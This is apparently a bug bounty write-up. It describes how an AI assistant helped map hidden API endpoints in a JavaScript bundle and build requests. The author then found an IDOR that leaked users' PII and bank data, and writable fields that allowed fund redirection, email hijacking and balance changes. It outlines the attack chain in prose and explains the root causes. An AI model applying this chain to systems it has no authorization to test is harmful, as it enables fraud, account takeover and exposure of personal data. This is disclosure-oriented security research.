TL;DR: I fed a JavaScript bundle to Claude Desktop (I use Burp MCP with Claude). It mapped hidden endpoints I'd missed after multiple reviews. That single nudge led me down a rabbit hole: predictable user IDs leaking PII of high-profile individuals, and write operations that allowed fund redirection, email hijacking, and balance manipulation. The AI didn't find the bug — but it handed me the flashlight.

Fun fact: I had reviewed this JavaScript file multiple times before without catching the vulnerable endpoint. It wasn't until I fed the code to Claude that it mapped out the endpoint structure and helped me craft a valid request. The AI didn't find the vulnerability itself — but it gave me the exact lens I needed to see what had been hiding in plain sight all along.

The Target

A private bug bounty program for a fitness company. Think celebrities, athletes, and executives as users. The platform handles memberships, payouts, and partner programs — real money flowing through real APIs.

The program name stays redacted. You know the rules.

Step 1: Let the AI Read What I Couldn't See

I'm a firm believer in reading JavaScript manually. Automated scanners are great, but they don't think. The problem? Sometimes neither do I — at least not after staring at the same minified bundle for the third time.

So I tried something different. I dropped the JS file into Claude and asked it to analyze the code, enumerate API endpoints, craft request and identify anything interesting.

Within seconds, it came back with a structured breakdown: endpoint paths, HTTP methods, parameter schemas, and even built me a valid POST request to test one particularly juicy route tied to a financial feature.

I had literally been looking at this same code. Multiple times. And missed it.

None

Lesson learned: sometimes a second pair of eyes doesn't need to be human.

Step 2: The IDOR — "Wait, That's Not My Account"

Armed with the AI-crafted request, I hit the endpoint using my own account ID — a simple numeric value. The response was generous:

→ Full name
→ Email address
→ Bank account identifier
→ Account balance
→ Internal account status
None

Cool. Now let me just change that ID by one…

Same data. Different person. No authorization check. The server didn't care who was asking — only what ID was provided.

I kept incrementing. Every single request returned a complete profile with financial details. And the accounts I was seeing? These weren't test users. These were high-profile individuals — the kind of people whose data breach makes headlines.

None

Step 3: "Can I Write Too?" — Spoiler: Yes

A read-only IDOR is already critical when you're leaking bank details of public figures. But I wanted the full picture.

I went back to the AI assistant, this time asking it to help me understand which parameters the endpoint would accept for modification. It helped me map the writable fields based on the JS source.

Then I tested three things:

Fund Redirection — I modified the bank account parameter. The server accepted it. Just like that, payouts could be rerouted to any account. Mine, yours, anyone's.

Email Hijacking — Changed the email field on a target account. Now trigger a password reset, catch it on your inbox, and you own the account. Classic, devastating, and entirely preventable.

Balance Manipulation — This one surprised even me. The balance field was writable. I could set it to zero. I could set it to a million. The server said "sure, sounds good" every single time.

None

The Kill Chain

Read JS with AI assistance → Discover hidden endpoint + valid request structure
      ↓
Send POST with sequential ID → Full PII of any user
      ↓
Enumerate IDs → Mass data exfiltration
      ↓
Modify bank account → Redirect funds
Modify email → Account takeover
Modify balance → Financial fraud

One JavaScript file. One AI conversation. Total compromise.

Why This Happened

Three classic failures stacked on top of each other:

No authorization. The API trusted the client to only ask for its own data. Spoiler: attackers don't follow the honor system.

Predictable IDs. Sequential integers as user identifiers. Enumeration was as simple as a for loop.

Mass assignment. The API let clients write to fields that should never be client-controlled — bank accounts, emails, balances. No allowlist, no validation, no separate workflow for sensitive changes.

The AI Factor

I want to be transparent about this because I think it matters for the community.

The AI didn't "hack" anything. It didn't exploit the vulnerability or even flag it as a security issue. What it did was process information faster and more systematically than I could on my fourth pass through minified JavaScript.

It enumerated every endpoint, organized them by HTTP method, identified parameter structures, and built me a working request. That's the kind of grunt work that usually takes an hour of squinting at obfuscated code — done in seconds.

The vulnerability discovery, the intuition to test for write access, the escalation strategy — that was all human judgment. But the starting point? That came from an AI reading code I'd already given up on.

If you're not using AI as part of your recon workflow, you're leaving bugs on the table. In my case a 4 digits bug.

None

Final Thoughts

Read the JavaScript and go deep in your target. If you've already read it — feed it to an AI and read it again. The bugs aren't hiding in the code you haven't seen. They're hiding in the code you've already looked at and dismissed.

After this i definitely bought Claude Pro subscription.

And when you find a read, always check for a write. That's where the severity jumps from "interesting" to "bugbounty journey-defining."

Happy hunting.

If you found this write-up useful, feel free to connect with me. I'm always happy to discuss methodology, share recon tips, or just talk.